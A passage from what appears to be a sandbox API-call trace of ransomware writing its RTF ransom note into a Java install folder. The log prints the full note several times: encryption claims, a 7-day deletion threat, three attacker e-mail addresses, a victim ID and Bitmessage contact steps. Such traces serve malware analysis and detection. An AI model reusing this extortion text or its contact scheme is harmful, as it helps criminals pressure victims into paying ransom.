R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x01zççÞ\x82Os\x98¦\x11\x1bÿÁ\x1e¨©®ÃU+(\x9c3>", lpUsedDefaultChar=0x0) returned 8717 [0204.918] WriteFile (in: hFile=0x2f8, lpBuffer=0x1ef7aa8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef7aa8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0204.919] CloseHandle (hObject=0x2f8) returned 1 [0204.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\#readme_eman#.rtf")) returned 0xffffffff [0204.920] GetLastError () returned 0x2 [0204.920] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f8 [0204.920] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0204.920] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0204.920] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef7aa8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 